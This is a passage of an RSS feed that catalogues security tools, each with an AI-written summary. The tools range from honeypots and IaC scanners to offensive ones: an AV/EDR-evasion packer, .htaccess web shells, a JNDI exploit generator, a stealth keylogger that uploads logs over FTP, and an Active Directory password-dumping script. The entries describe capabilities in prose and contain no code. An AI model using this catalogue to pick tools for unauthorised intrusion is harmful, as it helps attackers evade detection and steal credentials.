&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Qeeqbox/honeypots is a versatile package containing 30 customizable honeypots designed for monitoring network traffic, bot activities, and credential harvesting. It features non-blocking responses, easy setup and customization, and supports logging to various outputs, including Postgres databases, terminal, and Syslog. The tool encapsulates multiple protocols like HTTP, FTP, SSH, and more, facilitating quick deployment of multiple honeypots for enhanced threat detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt; &lt;img src="https://raw.githubusercontent.com/qeeqbox/honeypots/main/readme/honeypots.png"&gt;&lt;/p&gt;
&lt;p&gt;30 low-high level honeypots in a single PyPI package for monitoring network traffic, bots activities, and username \ password credentials.&lt;/p&gt;</description></item><item><title>HostHunter</title><link>https://rainmana.github.io/hackyfeed/tools/spiderlabs-hosthunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/spiderlabs-hosthunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HostHunter is a Python-based tool designed for the discovery and extraction of hostnames linked to specified IPv4 or IPv6 addresses, utilizing OSINT and active reconnaissance methods. It generates comprehensive reports in various formats, including CSV and Nessus, and features capabilities like SSL certificate extraction, hostname validation, and the ability to capture screenshots of target applications. This tool is particularly beneficial for organizations aiming to assess their attack surface effectively.&lt;/p&gt;</description></item><item><title>hrtng</title><link>https://rainmana.github.io/hackyfeed/tools/kasperskylab-hrtng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kasperskylab-hrtng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The hrtng IDA plugin provides a suite of tools designed to enhance the reverse engineering process within the IDA Pro environment, specifically leveraging the Hex-Rays decompiler. Its notable features include automation of variable renaming, interactive pseudocode transformations, various decryption capabilities, and assistance with obfuscated code analysis, all aimed at improving the efficiency and accuracy of binary analysis tasks. The plugin integrates seamlessly into IDA’s existing functionality, offering a structured approach to handling complex code scenarios.&lt;/p&gt;</description></item><item><title>htshells</title><link>https://rainmana.github.io/hackyfeed/tools/wireghoul-htshells/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wireghoul-htshells/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HTSHELLS is a toolkit that facilitates the deployment of self-contained web shells and various web-based attack vectors by utilizing .htaccess files. Its primary use case is for penetration testing and exploitation, allowing users to execute commands remotely and conduct denial-of-service, information disclosure, directory traversal, and other attacks through a structured directory of attack modules. Notable features include the ability to generate custom .htaccess files for specific attack types and execute commands via query parameters, enhancing flexibility for security assessments.&lt;/p&gt;</description></item><item><title>HyperDbg</title><link>https://rainmana.github.io/hackyfeed/tools/hyperdbg-hyperdbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hyperdbg-hyperdbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HyperDbg is an open-source, hypervisor-assisted debugger designed for advanced analysis, fuzzing, and reversing of Windows applications at both user and kernel levels. It leverages modern hardware features like Intel VT-x and EPT, enabling stealthy operation that resists detection by classic anti-debugging techniques, while offering unique capabilities such as hidden hooks and code coverage measurement. This tool is tailored for users with deep low-level system knowledge, providing full control over the operating system for intricate debugging tasks.&lt;/p&gt;</description></item><item><title>idacode</title><link>https://rainmana.github.io/hackyfeed/tools/ioncodes-idacode/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ioncodes-idacode/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; IDACode is a Visual Studio Code extension designed to facilitate the execution and debugging of Python scripts within the IDA Pro environment. Notable features include quick script execution, seamless integration with the Python debugger via &lt;code&gt;debugpy&lt;/code&gt;, and the ability to run scripts without modifications directly from IDA. The tool supports features like &amp;ldquo;Execute on save&amp;rdquo; for automatic script execution and has been tested for compatibility with IDA versions 8.4/9.0 and Python 3.12 on both Windows and macOS.&lt;/p&gt;</description></item><item><title>inceptor</title><link>https://rainmana.github.io/hackyfeed/tools/klezvirus-inceptor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/klezvirus-inceptor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Inceptor is a Windows-focused penetration testing tool designed to automate the bypassing of anti-virus (AV) and endpoint detection and response (EDR) solutions. It features a template-based PE packer that allows extensive user customization and integrates various encoding methods for encoding, compressing, or encrypting shellcode. Notably, Inceptor supports transformations of existing binaries into shellcode and distinguishes between loader-independent and loader-dependent encoders to enhance payload obfuscation and evade detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;:triangular_flag_on_post: This is the public repository of Inceptor, for latest version and updates please consider supporting us through &lt;a href="https://porchetta.industries/"&gt;https://porchetta.industries/&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Information_Collection_Handbook</title><link>https://rainmana.github.io/hackyfeed/tools/qftm-information_collection_handbook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qftm-information_collection_handbook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Information Collection Handbook is a comprehensive resource designed for penetration testers, focusing on effective information gathering techniques essential for vulnerability exploitation. It consolidates various methods and tools for domain and subdomain information collection, including online services, browser plugins, and advanced querying techniques, thereby enabling security professionals to uncover assets and vulnerabilities that may otherwise remain hidden. Notable features include detailed sections on Whois queries, DNS historical analysis, and strategies for bypassing content delivery networks (CDNs) to uncover real IP addresses.&lt;/p&gt;</description></item><item><title>Infosec_Reference</title><link>https://rainmana.github.io/hackyfeed/tools/rmusser01-infosec_reference/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rmusser01-infosec_reference/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The InfoSec Reference project serves as a comprehensive resource for individuals seeking to enhance their understanding of Information Security, offering a curated list of techniques, tools, and tactics. Its primary use case revolves around providing a &amp;ldquo;Yellow Pages&amp;rdquo; style reference for users to browse and learn about various aspects of infosec, helping them build skills and recall pertinent information. Notably, it encourages community contributions and maintains regular updates, while emphasizing a commitment to ethical practices in cybersecurity.&lt;/p&gt;</description></item><item><title>inql</title><link>https://rainmana.github.io/hackyfeed/tools/doyensec-inql/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/doyensec-inql/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; InQL is an open-source Burp Suite extension tailored for advanced GraphQL testing, enabling security professionals to effectively identify vulnerabilities within GraphQL APIs. It features a user-friendly interface, robust query manipulation capabilities, and integration with Burp&amp;rsquo;s existing tools, significantly enhancing the testing process for GraphQL applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="inql-v612---burp-extension-for-advanced-graphql-testing"&gt;InQL v6.1.2 - Burp Extension for Advanced GraphQL Testing&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://doyensec.com/research.html"&gt;&lt;img src="https://img.shields.io/static/v1?logo=data:image/png;base64,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&amp;amp;link=https://doyensec.com/research.html&amp;amp;message=Research%20Island&amp;amp;&amp;amp;label=Doyensec&amp;amp;color=purple" alt="Doyensec Research Island"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/license/doyensec/inql?logo=github&amp;amp;color=darkgreen" alt="GitHub"&gt;
&lt;img src="https://img.shields.io/github/v/release/doyensec/inql?label=latest%20release&amp;amp;logo=github" alt="GitHub release (latest by date)"&gt;
&lt;img src="https://img.shields.io/github/release-date/doyensec/inql?display_date=published_at&amp;amp;logo=github" alt="GitHub Release Date"&gt;
&lt;a href="https://github.com/doyensec/inql/tree/dev"&gt;&lt;img src="https://img.shields.io/github/commits-difference/doyensec/inql?base=master&amp;amp;head=dev&amp;amp;label=dev+branch+ahead+by&amp;amp;color=bright&amp;amp;logo=github" alt="dev branch ahead by"&gt;&lt;/a&gt;
&lt;a href="AUTHORS"&gt;&lt;img src="https://img.shields.io/github/contributors/doyensec/inql?logo=github&amp;amp;color=black" alt="GitHub contributors"&gt;&lt;/a&gt;
&lt;a href="https://github.com/doyensec/inql/issues?q=is%3Aissue+is%3Aopen+label%3A%22Help+Wanted%22"&gt;&lt;img src="https://img.shields.io/github/issues/doyensec/inql/Help%20Wanted?color=red&amp;amp;logo=github" alt="GitHub issues by-label"&gt;&lt;/a&gt;
&lt;a href="https://github.com/doyensec/inql/issues?q=is%3Aissue+is%3Aopen+label%3A%22Good+First+Issue%22"&gt;&lt;img src="https://img.shields.io/github/issues/doyensec/inql/Good%20First%20Issue?color=f0a&amp;amp;logo=github" alt="GitHub issues by-label"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Interlace</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-interlace/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-interlace/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Interlace is a command-line tool designed to enhance single-threaded applications by enabling multi-threading capabilities, specifically for penetration testing and bug bounty workflows. It supports CIDR and glob notation for target specification and allows users to define multiple parameters such as timeouts, threads, and various command options, facilitating efficient execution across various targets. Notable features include the ability to pipe target lists, utilize multiple proxies, and specify complex command files for diverse testing scenarios.&lt;/p&gt;</description></item><item><title>inventory</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-inventory/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-inventory/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Inventory is a tool designed for attack surface management of public bug bounty programs, aggregating DNS and web server data from over 800 organizations. Its primary use case is to assist bug bounty hunters in efficiently identifying and monitoring new assets while providing security teams with enhanced visibility into their assets. Notable features include automated data collection and transformation from multiple sources, duplicate program merging, and both passive and active enumeration workflows for comprehensive reconnaissance.&lt;/p&gt;</description></item><item><title>iOS</title><link>https://rainmana.github.io/hackyfeed/tools/ansjdnakjdnajkd-ios/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ansjdnakjdnajkd-ios/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The iOS/macOS penetration testing cheatsheet provides a curated list of tools and resources for conducting security assessments on iOS and macOS applications, including utilities for static analysis, obfuscation, and jailbreak checks. Notable features include links to tools such as MobSF, Frida, and Objection, facilitating the testing of application vulnerabilities across platforms. This repository serves as a comprehensive guide for security professionals looking to enhance their penetration testing workflows on Apple devices.&lt;/p&gt;</description></item><item><title>IPA</title><link>https://rainmana.github.io/hackyfeed/tools/seekbytes-ipa/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/seekbytes-ipa/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Interactive PDF Analysis (IPA) is a graphical tool designed for researchers to deeply explore and analyze the contents of PDF files, particularly focusing on suspicious or potentially malicious documents. Key features include metadata extraction, structural examination of PDF objects, visualization of object references, and the ability to salvage information from corrupted files, all without requiring external dependencies. The tool aims to enhance user experience compared to traditional command-line analysis methods, facilitating a clearer understanding of the relationships among various document elements.&lt;/p&gt;</description></item><item><title>jadx-ai-mcp</title><link>https://rainmana.github.io/hackyfeed/tools/zinja-coder-jadx-ai-mcp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zinja-coder-jadx-ai-mcp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JADX-AI-MCP is a fully automated server and plugin designed for analyzing Android APK files via large language models (LLMs) such as Claude, enabling efficient vulnerability discovery, APK analysis, and reverse engineering. Key features include seamless MCC communication and integration with powerful LLMs to enhance static analysis and security assessments within the Android development ecosystem.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;h1 id="jadx-ai-mcp-part-of-zin-mcp-suite"&gt;JADX-AI-MCP (Part of Zin MCP Suite)&lt;/h1&gt;
&lt;p&gt;⚡ Fully automated MCP server + JADX plugin built to communicate with LLM through MCP to analyze Android APKs using LLMs like Claude — uncover vulnerabilities, analyze APK, and reverse engineer effortlessly.&lt;/p&gt;</description></item><item><title>JNDI-Injection-Exploit-Plus</title><link>https://rainmana.github.io/hackyfeed/tools/cckuailong-jndi-injection-exploit-plus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cckuailong-jndi-injection-exploit-plus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JNDI-Injection-Exploit-Plus is a comprehensive tool designed for generating operational JNDI links, facilitating background services with RMI, LDAP, and HTTP servers to test vulnerabilities effectively. It enhances the functionality of standard JNDI exploit tools by offering additional remote and local reference gadgets, support for multiple JDK versions, and the capability to create base64 and hex payloads, making it a robust resource for security testing. With over 75 deserialization gadgets included, it provides a diverse set of options for vulnerability assessments.&lt;/p&gt;</description></item><item><title>JustTryHarder</title><link>https://rainmana.github.io/hackyfeed/tools/sinfulz-justtryharder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sinfulz-justtryharder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; JustTryHarder is a comprehensive cheat sheet designed to assist users in navigating the Penetration Testing with Kali Linux (PWK) course and preparing for the Offensive Security Certified Professional (OSCP) exam. It consolidates various penetration testing techniques, such as OS detection, privilege escalation, and exploitation methods, while providing clear examples and references. Notable features include a wide array of topics that cover essential hacking methodologies and tools, making it a valuable resource for both beginners and experienced practitioners in the cybersecurity field.&lt;/p&gt;</description></item><item><title>Keylogger</title><link>https://rainmana.github.io/hackyfeed/tools/ajayrandhawa-keylogger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ajayrandhawa-keylogger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Keylogger is a lightweight, open-source tool developed in Visual C++ for educational purposes, designed to monitor system activity by capturing keystrokes, mouse clicks, and periodic screenshots in stealth mode. Its notable features include FTP integration for automatic log uploads, the ability to run unnoticed in the background, and persistence through auto-start and auto-copy mechanisms. The tool emphasizes ethical use, warning against unauthorized application.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="keylogger"&gt;Keylogger&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://visitor-badge.laobi.icu/badge?page_id=ajayrandhawa.Keylogger&amp;amp;title=Visitor" alt="Visitor Badge"&gt;&lt;br&gt;
&lt;strong&gt;Please don&amp;rsquo;t forget to give us a ⭐ if you find this project useful!&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>kics</title><link>https://rainmana.github.io/hackyfeed/tools/checkmarx-kics/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/checkmarx-kics/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KICS (Keeping Infrastructure as Code Secure) is an open-source tool designed to identify security vulnerabilities, compliance issues, and infrastructure misconfigurations in infrastructure-as-code early in the development cycle. It supports various platforms and offers a comprehensive set of queries for thorough analysis, making it essential for maintaining security in cloud-native projects. Notable features include its integration capabilities and extensive documentation for ease of use, enhancing security throughout the software development lifecycle.&lt;/p&gt;</description></item><item><title>killshot</title><link>https://rainmana.github.io/hackyfeed/tools/bahaabdelwahed-killshot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bahaabdelwahed-killshot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KillShot is a comprehensive penetration testing framework designed for information gathering and website vulnerability scanning. Its primary use case involves automating data collection through integrated tools such as WhatWeb and Nmap, while offering features like a CMS Exploit Scanner and web application vulnerability assessments, including XSS and SQL injection detection. The framework also facilitates backdoor generation and includes a fuzzer, making it a versatile tool for security professionals.&lt;/p&gt;</description></item><item><title>krane</title><link>https://rainmana.github.io/hackyfeed/tools/appvia-krane/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/appvia-krane/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Krane is a Kubernetes RBAC static analysis tool designed to identify security risks within K8s RBAC configurations and provide mitigation suggestions. Key features include a customizable set of built-in and user-defined risk rules, a user-friendly dashboard for visualizing RBAC posture, continuous analysis capabilities within clusters, and integration with Slack for alerting on significant risks. Additionally, Krane offers reporting in machine-readable formats and can be deployed locally, within CI/CD pipelines, or as a standalone service.&lt;/p&gt;</description></item><item><title>lamda</title><link>https://rainmana.github.io/hackyfeed/tools/firerpa-lamda/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/firerpa-lamda/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FIRERPA is an advanced Android automation framework designed for on-device operations, providing a comprehensive suite of over 160 APIs for device management, UI automation, and diagnostics. Its primary use case is to enable lightweight, efficient automation for both physical and virtual Android devices, integrating AI-driven capabilities with robust remote desktop services. Notable features include built-in ADB/SSH/SCP support, extensive logging, encrypted scripting, and seamless deployment across a range of Android versions without complex configuration requirements.&lt;/p&gt;</description></item><item><title>lazy_importer</title><link>https://rainmana.github.io/hackyfeed/tools/justasmasiulis-lazy_importer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/justasmasiulis-lazy_importer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; lazy_importer is a C++ library designed to obfuscate API calls, enhancing the difficulty of reverse engineering software by ensuring that no identifiable strings or import declarations remain in memory or the executable. Key features include inlining capabilities, zero memory allocation, randomized function hashes for each compilation, and the ability to call functions without leaving a trace in data sections. This tool is particularly valuable for developers aiming to protect their software from static analysis and reverse engineering techniques.&lt;/p&gt;</description></item><item><title>leaky-paths</title><link>https://rainmana.github.io/hackyfeed/tools/ayoubfathi-leaky-paths/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ayoubfathi-leaky-paths/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Leaky Paths is a curated repository of high-quality wordlists designed for web content discovery, targeting misconfigurations and sensitive API endpoints in major web frameworks and infrastructure projects. It serves as a rapid assessment tool for pentesters, security engineers, and bug bounty hunters, emphasizing modern tech stack paths that yield valuable insights while intentionally maintaining a concise list for optimal efficiency. Notable features include paths associated with known vulnerabilities and endpoints that typically expose sensitive data, facilitating quick identification of potential security issues.&lt;/p&gt;</description></item><item><title>Learn-Web-Hacking</title><link>https://rainmana.github.io/hackyfeed/tools/lylemi-learn-web-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lylemi-learn-web-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Learn-Web-Hacking is a comprehensive guide designed for individuals interested in web security, systematically organizing essential concepts and knowledge related to web application vulnerabilities, network protocols, and penetration testing. It provides a historical perspective on the evolution of web security, foundational networking concepts, and a detailed exploration of common web vulnerabilities and defensive strategies. Additionally, it includes tool recommendations and resources, making it a valuable resource for both beginners and practitioners in the cybersecurity field.&lt;/p&gt;</description></item><item><title>linkedin2username</title><link>https://rainmana.github.io/hackyfeed/tools/initstring-linkedin2username/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/initstring-linkedin2username/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; linkedin2username is an OSINT tool designed to generate potential username formats for employees of a specified company using LinkedIn&amp;rsquo;s web interface, requiring user authentication without an API key. Key features include customizable output formats for usernames, the ability to append domain names, and options for depth of search and filtering by keywords. The tool leverages web scraping techniques and is sensitive to LinkedIn&amp;rsquo;s rate limits, making it suitable for security research purposes.&lt;/p&gt;</description></item><item><title>linux-smart-enumeration</title><link>https://rainmana.github.io/hackyfeed/tools/diego-treitos-linux-smart-enumeration/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/diego-treitos-linux-smart-enumeration/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Linux Smart Enumeration (LSE) is a shell script designed for penetration testing and Capture The Flag (CTF) challenges, aimed at gathering security-relevant information to assist in privilege escalation on Linux systems. Notable features include customizable verbosity levels, targeted section execution, process monitoring, and the ability to serve the script over the network for remote retrieval. The tool is intended to expose vulnerabilities gradually, prioritizing information based on its significance for privilege escalation.&lt;/p&gt;</description></item><item><title>linWinPwn</title><link>https://rainmana.github.io/hackyfeed/tools/lefayjey-linwinpwn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lefayjey-linwinpwn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; linWinPwn is a comprehensive bash script designed for Active Directory penetration testing on Linux, integrating various tools for enumeration, vulnerability checks, modifications, and password dumping. It features both an interactive mode for manual checks and an automated mode for streamlined enumeration, allowing users to perform a wide array of security assessments including LDAP, Kerberos, and MSSQL interactions. Notably, it supports a range of authentication methods and can execute critical checks for known vulnerabilities such as NoPac and ZeroLogon, making it an essential tool for security professionals.&lt;/p&gt;</description></item><item><title>lisa.py</title><link>https://rainmana.github.io/hackyfeed/tools/ant4g0nist-lisa.py/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ant4g0nist-lisa.py/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; lisa.py is a Model-Context Protocol (MCP) integration for LLDB, enabling AI assistants like Claude to interact with debugging sessions through a structured interface. It consists of a server component to handle communication and a plugin for LLDB that exposes debugging functionalities via JSON-RPC, allowing users to execute commands verbally and enhance the debugging experience with natural language processing. Notable features include the capability to create targets, manage breakpoints, control process execution, and evaluate expressions directly from the AI assistant.&lt;/p&gt;</description></item><item><title>LitterBox</title><link>https://rainmana.github.io/hackyfeed/tools/blacksnufkin-litterbox/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blacksnufkin-litterbox/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; LitterBox is a security analysis tool that provides a controlled sandbox environment for red teams to develop, test, and validate exploitation payloads and evasion techniques against modern detection systems. It features advanced analysis capabilities, including file identification, executable and document analysis, and LLM-assisted insights for improved malware behavior examination. Additionally, LitterBox supports various platforms, including Windows and Linux, and integrates easily with Docker, enhancing its usability in diverse security scenarios.&lt;/p&gt;</description></item><item><title>Lockdoor-Framework</title><link>https://rainmana.github.io/hackyfeed/tools/sofianehamlaoui-lockdoor-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sofianehamlaoui-lockdoor-framework/</guid><description>&lt;blockquote&gt;
